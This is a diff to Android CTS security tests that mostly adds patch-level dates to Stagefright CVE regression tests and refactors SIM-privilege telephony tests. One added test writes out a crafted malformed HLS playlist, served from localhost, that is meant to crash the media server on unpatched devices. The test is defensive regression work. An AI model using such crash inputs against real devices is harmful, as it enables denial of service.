doStagefrightTest(R.raw.bug_25812590);
}
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_6600() throws Exception {
doStagefrightTest(R.raw.cve_2015_6600);
}
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_6603() throws Exception {
doStagefrightTest(R.raw.cve_2015_6603);
}
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_6604() throws Exception {
doStagefrightTest(R.raw.cve_2015_6604);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-12")
public void testStagefright_bug_24157524() throws Exception {
- doStagefrightTest(R.raw.bug_24157524);
+ doStagefrightTestMediaCodec(R.raw.bug_24157524);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_3871() throws Exception {
doStagefrightTest(R.raw.cve_2015_3871);
}
+ @SecurityTest(minPatchLevel = "2016-04")
public void testStagefright_bug_26070014() throws Exception {
doStagefrightTest(R.raw.bug_26070014);
}
+ @SecurityTest(minPatchLevel = "2017-03")
public void testStagefright_bug_32915871() throws Exception {
doStagefrightTest(R.raw.bug_32915871);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-07")
public void testStagefright_bug_28333006() throws Exception {
doStagefrightTest(R.raw.bug_28333006);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-11")
public void testStagefright_bug_14388161() throws Exception {
doStagefrightTestMediaPlayer(R.raw.bug_14388161);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-07")
public void testStagefright_cve_2016_3755() throws Exception {
doStagefrightTest(R.raw.cve_2016_3755);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-09")
public void testStagefright_cve_2016_3878_b_29493002() throws Exception {
doStagefrightTest(R.raw.cve_2016_3878_b_29493002);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testBug_36819262() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_36819262_mpeg2, "video/mpeg2", 640, 480);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-11")
public void testStagefright_cve_2015_6608_b_23680780() throws Exception {
doStagefrightTest(R.raw.cve_2015_6608_b_23680780);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_bug_36715268() throws Exception {
doStagefrightTest(R.raw.bug_36715268);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-06")
public void testStagefright_bug_27855419_CVE_2016_2463() throws Exception {
doStagefrightTest(R.raw.bug_27855419);
}
+ @SecurityTest(minPatchLevel = "2015-11")
public void testStagefright_bug_19779574() throws Exception {
doStagefrightTest(R.raw.bug_19779574);
}
@@ -720,32 +788,127 @@
before any existing test methods
***********************************************************/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-02")
+ public void testStagefright_bug_68342866() throws Exception {
+ Thread server = new Thread() {
+ @Override
+ public void run() {
+ try (ServerSocket serverSocket = new ServerSocket(8080);
+ Socket conn = serverSocket.accept()) {
+ OutputStream outputstream = conn.getOutputStream();
+ InputStream inputStream = conn.getInputStream();
+ byte input[] = new byte[65536];
+ inputStream.read(input, 0, 65536);
+ String inputStr = new String(input);
+ if (inputStr.contains("bug_68342866.m3u8")) {
+ byte http[] = ("HTTP/1.0 200 OK\r\nContent-Type: application/x-mpegURL\r\n\r\n")
+ .getBytes();
+ byte playlist[] = new byte[] { 0x23, 0x45, 0x58, 0x54,
+ 0x4D, 0x33, 0x55, 0x0A, 0x23, 0x45, 0x58, 0x54,
+ 0x2D, 0x58, 0x2D, 0x53, 0x54, 0x52, 0x45, 0x41,
+ 0x4D, 0x2D, 0x49, 0x4E, 0x46, 0x46, 0x43, 0x23,
+ 0x45, 0x3A, 0x54, 0x42, 0x00, 0x00, 0x00, 0x0A,
+ 0x00, 0x00, 0x00, 0x00, 0x00, (byte) 0xFF,
+ (byte) 0xFF, (byte) 0xFF, (byte) 0xFF,
+ (byte) 0xFF, (byte) 0xFF, 0x3F, 0x2C, 0x4E,
+ 0x46, 0x00, 0x00 };
+ outputstream.write(http);
+ outputstream.write(playlist);
+ }
+ } catch (IOException e) {
+ }
+ }
+ };
+ server.start();
+ String uri = "http://127.0.0.1:8080/bug_68342866.m3u8";
+ final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
+ LooperThread t = new LooperThread(new Runnable() {
+ @Override
+ public void run() {
+ MediaPlayer mp = new MediaPlayer();
+ mp.setOnErrorListener(mpcl);
+ mp.setOnPreparedListener(mpcl);
+ mp.setOnCompletionListener(mpcl);
+ Surface surface = getDummySurface();
+ mp.setSurface(surface);
+ AssetFileDescriptor fd = null;
+ try {
+ mp.setDataSource(uri);
+ mp.prepareAsync();
+ } catch (IOException e) {
+ Log.e(TAG, e.toString());
+ } finally {
+ closeQuietly(fd);
+ }
+ Looper.loop();
+ mp.release();
+ }
+ });
+ t.start();
+ assertFalse("Device *IS* vulnerable to BUG-68342866",
+ mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
+ t.stopLooper();
+ t.join();
+ server.join();
+ }
+
+ @SecurityTest(minPatchLevel = "2018-05")
+ public void testStagefright_bug_74114680() throws Exception {
+ doStagefrightTest(R.raw.bug_74114680_ts, (10 * 60 * 1000));
+ }
+
+ @SecurityTest(minPatchLevel = "2018-03")
+ public void testStagefright_bug_70239507() throws Exception {
+ doStagefrightTestExtractorSeek(R.raw.bug_70239507,1311768465173141112L);
+ }
+
+ @SecurityTest(minPatchLevel = "2017-03")
+ public void testBug_33250932() throws Exception {
+ int[] frameSizes = {65, 11, 102, 414};
+ doStagefrightTestRawBlob(R.raw.bug_33250932_avc, "video/avc", 640, 480, frameSizes);
+ }
+
+ @SecurityTest(minPatchLevel = "2017-08")
+ public void testStagefright_bug_37430213() throws Exception {
+ doStagefrightTest(R.raw.bug_37430213);
+ }
+
+ @SecurityTest(minPatchLevel = "2018-11")
+ public void testStagefright_bug_68664359() throws Exception {
+ doStagefrightTest(R.raw.bug_68664359, 60000);
+ }
+
+ @SecurityTest(minPatchLevel = "2018-11")
+ public void testStagefright_bug_110435401() throws Exception {
+ doStagefrightTest(R.raw.bug_110435401, 60000);
+ }
+
+ @SecurityTest(minPatchLevel = "2017-03")
public void testStagefright_cve_2017_0474() throws Exception {
doStagefrightTest(R.raw.cve_2017_0474, 120000);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_cve_2017_0765() throws Exception {
doStagefrightTest(R.raw.cve_2017_0765);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-04")
public void testStagefright_cve_2017_13276() throws Exception {
doStagefrightTest(R.raw.cve_2017_13276);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-12")
public void testStagefright_cve_2016_6764() throws Exception {
doStagefrightTest(R.raw.cve_2016_6764);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testStagefright_cve_2017_13214() throws Exception {
doStagefrightTest(R.raw.cve_2017_13214);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-06")
public void testStagefright_bug_35467107() throws Exception {
doStagefrightTest(R.raw.bug_35467107);
}
@@ -755,23 +918,58 @@
before any existing test methods
***********************************************************/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-03")
+ public void testStagefright_cve_2017_17773() throws Exception {
+ doStagefrightTest(R.raw.cve_2017_17773);
+ }
+
+ @SecurityTest(minPatchLevel = "2018-04")
+ public void testStagefright_cve_2017_18074() throws Exception {
+ doStagefrightTest(R.raw.cve_2017_18074);
+ }
+
+ @SecurityTest(minPatchLevel = "2018-06")
+ public void testStagefright_cve_2018_5894() throws Exception {
+ doStagefrightTest(R.raw.cve_2018_5894);
+ }
+
+ @SecurityTest(minPatchLevel = "2018-07")
+ public void testStagefright_cve_2018_5874() throws Exception {
+ doStagefrightTest(R.raw.cve_2018_5874);
+ }
+
+ @SecurityTest(minPatchLevel = "2018-07")
+ public void testStagefright_cve_2018_5875() throws Exception {
+ doStagefrightTest(R.raw.cve_2018_5875);
+ }
+
+ @SecurityTest(minPatchLevel = "2018-07")
+ public void testStagefright_cve_2018_5876() throws Exception {
+ doStagefrightTest(R.raw.cve_2018_5876);
+ }
+
+ @SecurityTest(minPatchLevel = "2018-07")
+ public void testStagefright_cve_2018_5882() throws Exception {
+ doStagefrightTest(R.raw.cve_2018_5882);
+ }
+
+ @SecurityTest(minPatchLevel = "2017-12")
public void testBug_65186291() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_65186291_framelen);
doStagefrightTestRawBlob(R.raw.bug_65186291_hevc, "video/hevc", 1920, 1080, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testBug_67737022() throws Exception {
doStagefrightTest(R.raw.bug_67737022);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_bug_37093318() throws Exception {
doStagefrightTest(R.raw.bug_37093318, (4 * 60 * 1000));
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-05")
public void testStagefright_bug_73172046() throws Exception {
doStagefrightTest(R.raw.bug_73172046);
@@ -783,36 +981,68 @@
}
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-03")
public void testStagefright_cve_2016_0824() throws Exception {
doStagefrightTest(R.raw.cve_2016_0824);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-03")
public void testStagefright_cve_2016_0815() throws Exception {
doStagefrightTest(R.raw.cve_2016_0815);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-05")
public void testStagefright_cve_2016_2454() throws Exception {
doStagefrightTest(R.raw.cve_2016_2454);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-12")
public void testStagefright_cve_2016_6765() throws Exception {
doStagefrightTest(R.raw.cve_2016_6765);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-07")
public void testStagefright_cve_2016_2508() throws Exception {
doStagefrightTest(R.raw.cve_2016_2508);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-11")
public void testStagefright_cve_2016_6699() throws Exception {
doStagefrightTest(R.raw.cve_2016_6699);
}
+ @SecurityTest(minPatchLevel = "2018-06")
+ public void testStagefright_cve_2017_18155() throws Exception {
+ doStagefrightTest(R.raw.cve_2017_18155);
+ }
+
+ @SecurityTest(minPatchLevel = "2018-07")
+ public void testStagefright_cve_2018_9423() throws Exception {
+ doStagefrightTest(R.raw.cve_2018_9423);
+ }
+
+ @SecurityTest(minPatchLevel = "2016-09")
+ public void testStagefright_cve_2016_3879() throws Exception {
+ doStagefrightTest(R.raw.cve_2016_3879);
+ }
+
+ @SecurityTest(minPatchLevel = "2017-07")
+ public void testStagefright_xaac_not_present() throws Exception {
+ // ensure that the xaac codec is not present
+ MediaCodec codec;
+ String names[] = new String[] { "c2.android.xaac.decoder", "OMX.google.xaac.decoder" };
+ for (String name : names) {
+ Log.w(TAG, "trying to create codec: " + name);
+ try {
+ codec = MediaCodec.createByCodecName(name);
+ fail("not allowed to createByCodecName() for " + name);
+ } catch (IllegalArgumentException e) {
+ // expected
+ Log.w(TAG, "correctly unable to instantiate code for " + name);
+ }
+ }
+ }
+
private void doStagefrightTest(final int rid) throws Exception {
doStagefrightTestMediaPlayer(rid);
doStagefrightTestMediaCodec(rid);
@@ -1296,34 +1526,37 @@
doStagefrightTestRawBlob(R.raw.bug_36215950, "video/hevc", 320, 240);
}
+ @SecurityTest(minPatchLevel = "2017-08")
public void testBug36816007() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_36816007, "video/avc", 320, 240);
}
+ @SecurityTest(minPatchLevel = "2017-05")
public void testBug36895511() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_36895511, "video/hevc", 320, 240);
}
+ @SecurityTest(minPatchLevel = "2017-11")
public void testBug64836894() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_64836894, "video/avc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testCve_2017_0687() throws Exception {
doStagefrightTestRawBlob(R.raw.cve_2017_0687, "video/avc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testBug_37930177() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_37930177_hevc, "video/hevc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testBug_37712181() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_37712181_hevc, "video/hevc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-04")
public void testBug_70897394() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_70897394_avc, "video/avc", 320, 240);
}
@@ -1660,4 +1893,68 @@
t.stopLooper();
t.join(); // wait for thread to exit so we're sure the player was released
}
+
+ private void doStagefrightTestExtractorSeek(final int rid, final long offset) throws Exception {
+ final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
+ LooperThread thr = new LooperThread(new Runnable() {
+ @Override
+ public void run() {
+ MediaPlayer mp = new MediaPlayer();
+ mp.setOnErrorListener(mpcl);
+ try {
+ AssetFileDescriptor fd = getInstrumentation().getContext().getResources()
+ .openRawResourceFd(R.raw.good);
+ mp.setDataSource(fd.getFileDescriptor(),
+ fd.getStartOffset(),
+ fd.getLength());
+ fd.close();
+ } catch (Exception e) {
+ fail("setDataSource of known-good file failed");
+ }
+ synchronized(mpcl) {
+ mpcl.notify();
+ }
+ Looper.loop();
+ mp.release();
+ }
+ });
+ thr.start();
+ synchronized(mpcl) {
+ mpcl.wait();
+ }
+ Resources resources = getInstrumentation().getContext().getResources();
+ MediaExtractor ex = new MediaExtractor();
+ AssetFileDescriptor fd = resources.openRawResourceFd(rid);
+ try {
+ ex.setDataSource(fd.getFileDescriptor(), fd.getStartOffset(), fd.getLength());
+ } catch (IOException e) {
+ } finally {
+ closeQuietly(fd);
+ }
+ int numtracks = ex.getTrackCount();
+ String rname = resources.getResourceEntryName(rid);
+ Log.i(TAG, "start mediaextractor test for: " + rname + ", which has " + numtracks + " tracks");
+ for (int t = 0; t < numtracks; t++) {
+ try {
+ ex.selectTrack(t);
+ } catch (IllegalArgumentException e) {
+ Log.w(TAG, "couldn't select track " + t);
+ }
+ ex.seekTo(0, MediaExtractor.SEEK_TO_CLOSEST_SYNC);
+ ex.advance();
+ ex.seekTo(offset, MediaExtractor.SEEK_TO_NEXT_SYNC);
+ try
+ {
+ ex.unselectTrack(t);
+ }
+ catch (Exception e) {
+ }
+ }
+ ex.release();
+ String cve = rname.replace("_", "-").toUpperCase();
+ assertFalse("Device *IS* vulnerable to " + cve,
+ mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
+ thr.stopLooper();
+ thr.join();
+ }
}
diff --git a/tests/tests/security/src/android/security/cts/VerifiedBootTest.java b/tests/tests/security/src/android/security/cts/VerifiedBootTest.java
index 8d388cc..a3209fc 100644
--- a/tests/tests/security/src/android/security/cts/VerifiedBootTest.java
+++ b/tests/tests/security/src/android/security/cts/VerifiedBootTest.java
@@ -21,7 +21,6 @@
import android.platform.test.annotations.SecurityTest;
import android.test.AndroidTestCase;
import com.android.compatibility.common.util.PropertyUtil;
-import com.android.compatibility.common.util.CddTest;
@SecurityTest
public class VerifiedBootTest extends AndroidTestCase {
@@ -43,7 +42,6 @@
* A device without the feature flag android.hardware.ram.normal is exempt if
* it launched on a pre-P level.
*/
- @CddTest(requirement="9.10/C-1-1,C-2-1")
public void testVerifiedBootSupport() throws Exception {
if (PropertyUtil.getFirstApiLevel() < Build.VERSION_CODES.O_MR1) {
return;
diff --git a/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java b/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java
index ef9316f..d0afec0 100644
--- a/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java
+++ b/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java
@@ -39,7 +39,7 @@
}
//Testing security bug: 30229821
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testVisualizer_MalformedConstructor() throws Exception {
final String VISUALIZER_TYPE = "e46b26a0-dddd-11db-8afd-0002a5d5c51b";
final int VISUALIZER_CMD_MEASURE = 0x10001;
diff --git a/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java b/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java
index fc28247..5368e93 100644
--- a/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java
+++ b/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java
@@ -33,7 +33,7 @@
* Prior to fixing bug 33300701, decoding resulted in undefined behavior (divide by zero).
* With the fix, decoding will fail, without dividing by zero.
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void test_android_bug_33300701() {
InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33300701);
Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
diff --git a/tests/tests/telephony/src/android/telephony/cts/CarrierConfigManagerTest.java b/tests/tests/telephony/src/android/telephony/cts/CarrierConfigManagerTest.java
index e1854cc..f6b30d8 100644
--- a/tests/tests/telephony/src/android/telephony/cts/CarrierConfigManagerTest.java
+++ b/tests/tests/telephony/src/android/telephony/cts/CarrierConfigManagerTest.java
@@ -50,12 +50,7 @@
}
private boolean isSimCardPresent() {
- return mTelephonyManager.getPhoneType() != TelephonyManager.PHONE_TYPE_NONE &&
- mTelephonyManager.getSimState() != TelephonyManager.SIM_STATE_ABSENT;
- }
-
- private boolean isSimCardAbsent() {
- return mTelephonyManager.getSimState() == TelephonyManager.SIM_STATE_ABSENT;
+ return mTelephonyManager.getSimState() != TelephonyManager.SIM_STATE_ABSENT;
}
private void checkConfig(PersistableBundle config) {
@@ -64,7 +59,7 @@
return;
}
assertNotNull("CarrierConfigManager should not return null config", config);
- if (isSimCardAbsent()) {
+ if (!isSimCardPresent()) {
// Static default in CarrierConfigManager will be returned when no sim card present.
assertEquals("Config doesn't match static default.",
config.getBoolean(CarrierConfigManager.KEY_ADDITIONAL_CALL_SETTING_BOOL), true);
diff --git a/tests/tests/telephony4/src/android/telephony4/cts/SimRestrictedApisTest.java b/tests/tests/telephony/src/android/telephony/cts/SimRestrictedApisTest.java
similarity index 82%
rename from tests/tests/telephony4/src/android/telephony4/cts/SimRestrictedApisTest.java
rename to tests/tests/telephony/src/android/telephony/cts/SimRestrictedApisTest.java
index dd56952..b15a4e8 100644
--- a/tests/tests/telephony4/src/android/telephony4/cts/SimRestrictedApisTest.java
+++ b/tests/tests/telephony/src/android/telephony/cts/SimRestrictedApisTest.java
@@ -14,7 +14,7 @@
* limitations under the License.
*/
-package android.telephony4.cts;
+package android.telephony.cts;
import android.content.Context;
import android.telephony.SmsManager;
@@ -67,6 +67,21 @@
}
/**
+ * Tests the TelephonyManager.setLine1NumberForDisplay(long, string, string) API. This makes a
+ * call to setLine1NumberForDisplay() API and expects a SecurityException since the test apk is
+ * not signed by the certificate on the SIM.
+ */
+ public void testSetLine1NumberForDisplay2() {
+ try {
+ if (isSimCardPresent()) {
+ TelephonyManager.getDefault().setLine1NumberForDisplay(0, "", "");
+ fail("Expected SecurityException. App doesn't have carrier privileges.");
+ }
+ } catch (SecurityException expected) {
+ }
+ }
+
+ /**
* Tests the TelephonyManager.iccOpenLogicalChannel() API. This makes a call to
* iccOpenLogicalChannel() API and expects a SecurityException since the test apk is not signed
* by certificate on the SIM.
@@ -74,8 +89,7 @@
public void testIccOpenLogicalChannel() {
try {
if (isSimCardPresent()) {
- TelephonyManager.getDefault().iccCloseLogicalChannel(
- TelephonyManager.getDefault().iccOpenLogicalChannel("").getChannel());
+ TelephonyManager.getDefault().iccOpenLogicalChannel("");
fail("Expected SecurityException. App doesn't have carrier privileges.");
}
} catch (SecurityException expected) {
@@ -157,13 +171,41 @@
}
/**
+ * Tests the TelephonyManager.nvWriteItem() API. This makes a call to nvWriteItem() API and
+ * expects a SecurityException since the test apk is not signed by a certificate on the SIM.
+ */
+ public void testNvWriteItem() {
+ try {
+ if (isSimCardPresent()) {
+ TelephonyManager.getDefault().nvWriteItem(0, "");
+ fail("Expected SecurityException. App doesn't have carrier privileges.");
+ }
+ } catch (SecurityException expected) {
+ }
+ }
+
+ /**
+ * Tests the TelephonyManager.nvWriteCdmaPrl() API. This makes a call to nvWriteCdmaPrl() API
+ * and expects a SecurityException since the test apk is not signed by a certificate on the SIM.
+ */
+ public void testNvWriteCdmaPrl() {
+ try {
+ if (isSimCardPresent()) {
+ TelephonyManager.getDefault().nvWriteCdmaPrl(null);
+ fail("Expected SecurityException. App doesn't have carrier privileges.");
+ }
+ } catch (SecurityException expected) {
+ }
+ }
+
+ /**
* Tests the TelephonyManager.nvResetConfig() API. This makes a call to nvResetConfig() API and
* expects a SecurityException since the test apk is not signed by a certificate on the SIM.
*/
public void testNvResetConfig() {
try {
if (isSimCardPresent()) {
- TelephonyManager.getDefault().nvResetConfig(1);
+ TelephonyManager.getDefault().nvResetConfig(0);
fail("Expected SecurityException. App doesn't have carrier privileges.");
}
} catch (SecurityException expected) {
@@ -204,7 +246,7 @@
* Tests that the test apk doesn't have carrier previliges.
*/
public void testHasCarrierPrivileges() {
- if (mTelephonyManager.hasCarrierPrivileges()) {
+ if (TelephonyManager.getDefault().hasCarrierPrivileges()) {
fail("App unexpectedly has carrier privileges");
}
}
diff --git a/tests/tests/telephony/src/android/telephony/cts/SubscriptionManagerTest.java b/tests/tests/telephony/src/android/telephony/cts/SubscriptionManagerTest.java
index 4e1cb8b..18a18d7 100644
--- a/tests/tests/telephony/src/android/telephony/cts/SubscriptionManagerTest.java
+++ b/tests/tests/telephony/src/android/telephony/cts/SubscriptionManagerTest.java
@@ -64,10 +64,44 @@
private int mSubId;
private String mPackageName;
+ /**
+ * Callback used in testRegisterNetworkCallback that allows caller to block on
+ * {@code onAvailable}.
+ */
+ private static class TestNetworkCallback extends ConnectivityManager.NetworkCallback {
+ private final CountDownLatch mAvailableLatch = new CountDownLatch(1);
+
+ public void waitForAvailable() throws InterruptedException {
+ assertTrue("Cellular network did not come up after 5 seconds",
+ mAvailableLatch.await(5, TimeUnit.SECONDS));
+ }
+
+ @Override
+ public void onAvailable(Network network) {
+ mAvailableLatch.countDown();
+ }
+ }
+
@BeforeClass
public static void setUpClass() throws Exception {
InstrumentationRegistry.getInstrumentation().getUiAutomation()
.executeShellCommand("svc wifi disable");
+
+ final TestNetworkCallback callback = new TestNetworkCallback();
+ final ConnectivityManager cm = InstrumentationRegistry.getContext()
+ .getSystemService(ConnectivityManager.class);
+ cm.registerNetworkCallback(new NetworkRequest.Builder()
+ .addTransportType(TRANSPORT_CELLULAR)
+ .addCapability(NET_CAPABILITY_INTERNET)
+ .build(), callback);
+ try {
+ // Wait to get callback for availability of internet
+ callback.waitForAvailable();
+ } catch (InterruptedException e) {
+ fail("NetworkCallback wait was interrupted.");
+ } finally {
+ cm.unregisterNetworkCallback(callback);
+ }
}
@AfterClass
@@ -84,21 +118,25 @@
}
/**
- * Sanity check that the device has a cellular network and a valid default data subId
- * when {@link PackageManager#FEATURE_TELEPHONY} support.
+ * Sanity check that both {@link PackageManager#FEATURE_TELEPHONY} and
+ * {@link NetworkCapabilities#TRANSPORT_CELLULAR} network must both be
+ * either defined or undefined; you can't cross the streams.
*/
@Test
public void testSanity() throws Exception {
- if (!isSupported()) return;
-
final boolean hasCellular = findCellularNetwork() != null;
- if (!hasCellular) {
+ if (isSupported() && !hasCellular) {
fail("Device claims to support " + PackageManager.FEATURE_TELEPHONY
+ " but has no active cellular network, which is required for validation");
+ } else if (!isSupported() && hasCellular) {
+ fail("Device has active cellular network, but claims to not support "
+ + PackageManager.FEATURE_TELEPHONY);
}
- if (mSubId == SubscriptionManager.INVALID_SUBSCRIPTION_ID) {
- fail("Device must have a valid default data subId for validation");
+ if (isSupported()) {
+ if (mSubId == SubscriptionManager.INVALID_SUBSCRIPTION_ID) {
+ fail("Device must have a valid default data subId for validation");
+ }
}
}
diff --git a/tests/tests/telephony4/Android.mk b/tests/tests/telephony4/Android.mk
deleted file mode 100644
index 293224f..0000000
--- a/tests/tests/telephony4/Android.mk
+++ /dev/null
@@ -1,48 +0,0 @@
-# Copyright (C) 2019 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-
-LOCAL_PATH:= $(call my-dir)
-
-include $(CLEAR_VARS)
-
-# don't include this package in any target
-LOCAL_MODULE_TAGS := optional
-# and when built explicitly put it in the data partition
-LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS)
-
-LOCAL_JAVA_LIBRARIES := telephony-common \
- android.test.runner.stubs \
- android.test.base.stubs
-
-LOCAL_STATIC_JAVA_LIBRARIES := \
- ctstestrunner \
- compatibility-device-util \
- truth-prebuilt
-
-LOCAL_HOST_SHARED_LIBRARIES := compatibility-device-telephony-preconditions
-
-LOCAL_SRC_FILES := $(call all-java-files-under, src)
-
-LOCAL_PACKAGE_NAME := CtsSimRestrictedApisTestCases
-LOCAL_PRIVATE_PLATFORM_APIS := true
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
-
-LOCAL_CERTIFICATE := cts/tests/tests/telephony4/certs/android_telephony_cts_testkey
-
-
-include $(BUILD_CTS_PACKAGE)
-include $(call all-makefiles-under,$(LOCAL_PATH))
diff --git a/tests/tests/telephony4/AndroidManifest.xml b/tests/tests/telephony4/AndroidManifest.xml
deleted file mode 100644
index b292bb1..0000000
--- a/tests/tests/telephony4/AndroidManifest.xml
+++ /dev/null
@@ -1,32 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<!-- Copyright (C) 2019 The Android Open Source Project
-
- Licensed under the Apache License, Version 2.0 (the "License");
- you may not use this file except in compliance with the License.
- You may obtain a copy of the License at
-
- http://www.apache.org/licenses/LICENSE-2.0
-
- Unless required by applicable law or agreed to in writing, software
- distributed under the License is distributed on an "AS IS" BASIS,
- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- See the License for the specific language governing permissions and
- limitations under the License.
--->
-
-<manifest xmlns:android="http://schemas.android.com/apk/res/android"
- package="android.telephony4.cts">
-
- <application>
- <uses-library android:name="android.test.runner" />
- </application>
-
- <instrumentation android:name="android.support.test.runner.AndroidJUnitRunner"
- android:targetPackage="android.telephony4.cts"
- android:label="CTS tests of android.telephony4">
- <meta-data android:name="listener"
- android:value="com.android.cts.runner.CtsTestRunListener" />
- </instrumentation>
-
-</manifest>
-
diff --git a/tests/tests/telephony4/AndroidTest.xml b/tests/tests/telephony4/AndroidTest.xml
deleted file mode 100644
index 636ecbb..0000000
--- a/tests/tests/telephony4/AndroidTest.xml
+++ /dev/null
@@ -1,27 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<!-- Copyright (C) 2019 The Android Open Source Project
-
- Licensed under the Apache License, Version 2.0 (the "License");
- you may not use this file except in compliance with the License.
- You may obtain a copy of the License at
-
- http://www.apache.org/licenses/LICENSE-2.0
-
- Unless required by applicable law or agreed to in writing, software
- distributed under the License is distributed on an "AS IS" BASIS,
- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- See the License for the specific language governing permissions and
- limitations under the License.
--->
-<configuration description="Config for CTS Telephony4 test cases">
- <option name="test-suite-tag" value="cts" />
- <option name="config-descriptor:metadata" key="component" value="telecom" />
- <option name="not-shardable" value="true" />
- <target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller">
- <option name="cleanup-apks" value="true" />
- <option name="test-file-name" value="CtsSimRestrictedApisTestCases.apk" />
- </target_preparer>
- <test class="com.android.tradefed.testtype.AndroidJUnitTest" >
- <option name="package" value="android.telephony4.cts" />
- </test>
-</configuration>
diff --git a/tests/tests/telephony4/certs/android_telephony_cts_testkey.pk8 b/tests/tests/telephony4/certs/android_telephony_cts_testkey.pk8
deleted file mode 100644
index f83d5ed..0000000
--- a/tests/tests/telephony4/certs/android_telephony_cts_testkey.pk8
+++ /dev/null
Binary files differ
diff --git a/tests/tests/telephony4/certs/android_telephony_cts_testkey.x509.pem b/tests/tests/telephony4/certs/android_telephony_cts_testkey.x509.pem
deleted file mode 100644
index 29ffd6a..0000000
--- a/tests/tests/telephony4/certs/android_telephony_cts_testkey.x509.pem
+++ /dev/null
@@ -1,30 +0,0 @@
------BEGIN CERTIFICATE-----
-MIIF9TCCA92gAwIBAgIVAIja2SQYIM1wfIrwgObEUdBk/MfkMA0GCSqGSIb3DQEBCwUAMIGKMQsw
-CQYDVQQGEwJVUzETMBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UEBxMNTW91bnRhaW4gVmlldzEU
-MBIGA1UEChMLR29vZ2xlIEluYy4xEDAOBgNVBAsTB0FuZHJvaWQxJjAkBgNVBAMMHWFuZHJvaWRf
-dGVsZXBob255X2N0c190ZXN0a2V5MB4XDTE5MDExMTE5MzMwM1oXDTQ5MDExMTE5MzMwM1owgYox
-CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1Nb3VudGFpbiBWaWV3
-MRQwEgYDVQQKEwtHb29nbGUgSW5jLjEQMA4GA1UECxMHQW5kcm9pZDEmMCQGA1UEAwwdYW5kcm9p
